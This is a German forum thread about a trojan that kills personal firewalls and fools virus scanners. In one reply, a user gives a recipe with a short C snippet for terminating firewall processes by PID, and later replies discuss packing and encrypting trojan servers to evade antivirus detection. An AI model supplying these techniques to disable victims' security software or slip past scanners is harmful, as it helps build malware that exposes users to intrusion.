Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge

was halten die Experten hier davon...?

(Anonym) / 6 Antworten / Baumansicht Nickles

Hi Forum,
wieder ein neuer Trojaner, der Personal Firewalls killt und Viren/Trojaner-Scanner an der Nase herumführt!

http://www.astonsoft.com/optix.htm

bei Antwort benachrichtigen
Wen interessiert das schon? (Anonym) „was halten die Experten hier davon...?“
Optionen

Nur einer von vielen, die das können!
Den Teil der Engine, der das Ausschalten übernimmt ist auf den div. Cracker-Seiten im Netz doch als Source zu haben, so kann sich jeder halbwegs c/c++ feste Bastler diesen holen und loslegen so einen Trojaner zu bauen! Die AV Hersteller hinken da immer nach!

bei Antwort benachrichtigen
(Anonym) Wen interessiert das schon? „Nur einer von vielen, die das können! Den Teil der Engine, der das Ausschalten...“
Optionen

Wo ist da das Problem?
- PersonalFirewall deiner Wahl installieren
- schauen in den Taskmonitor deiner Windoof-Büchse
- Name des Firewalltask merken oder aufschreiben
- das alles für jede PersonalFirewall die du killen möchtest weiderholen

Jetzt exemplarisch für C/C++:
- im Programm mit den Namen die zugehörige PID's ermitteln
- und dann in Schleife mit den PID's folgendes machen

HANDLE hProcess;
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if (hProcess)
{
    hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
    if (hProcess == NULL){return FALSE;}
    if (!TerminateProcess( hProcess, 1 ))
    {
      CloseHandle( hProcess );
      return FALSE;
    }
    CloseHandle( hProcess );
    return TRUE;
}

und damit ist die Firewall oder mehrere weg, aus, vorbei!

bei Antwort benachrichtigen
Harry Hunger (Anonym) „was halten die Experten hier davon...?“
Optionen

McAfee erkennt ihn bei eigeschalteter Heuristik als "New BackDoor".

bei Antwort benachrichtigen
(Anonym) Harry Hunger „McAfee erkennt ihn bei eigeschalteter Heuristik als New BackDoor .“
Optionen

auch wenn er packed u. crypted ist, so wie empfohlen?

bei Antwort benachrichtigen
Harry Hunger (Anonym) „was halten die Experten hier davon...?“
Optionen

Packen und crypten kann man aber jeden Server, oder? (Ich hab's selber noch nicht probiert.)

bei Antwort benachrichtigen
(Anonym) Harry Hunger „Packen und crypten kann man aber jeden Server, oder? Ich hab s selber noch nicht...“
Optionen

jede Datei!

bei Antwort benachrichtigen